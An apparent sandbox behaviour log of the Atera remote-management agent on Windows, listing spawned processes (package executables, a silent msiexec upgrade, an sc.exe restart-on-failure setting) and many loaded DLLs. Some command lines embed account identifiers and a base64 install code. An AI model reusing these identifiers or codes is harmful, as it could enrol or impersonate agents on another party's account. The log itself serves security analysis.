                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "e2b0e7a4-c205-4ab0-a41f-defa03df179f" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "435e53fd-9fe0-4f2b-90af-84e628f86498" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "03083ea1-baf1-4e78-a683-5c6842958609" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "8156d760-c467-46e9-825a-383940c0c629" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "756f8df8-494a-4cdb-9b3b-3f26b40ddc77" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "3117f898-c24e-40df-9020-7a24bf326b25" agent-api.atera.com/Production 443 or8ixLi90Mf "getlistofallupdates" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "ff450401-d5c7-4b18-a355-4c1c5f3fd956" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "bc07ae14-1fb3-4ad8-825a-cd1339068a47" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\msiexec.exe "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI77D8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4552734 37 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI7BC1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4553718 41 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: riched20.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: usp10.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msls31.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: webio.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: edputil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wintypes.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: appresolver.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: bcp47langs.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: slc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sppc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: webio.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
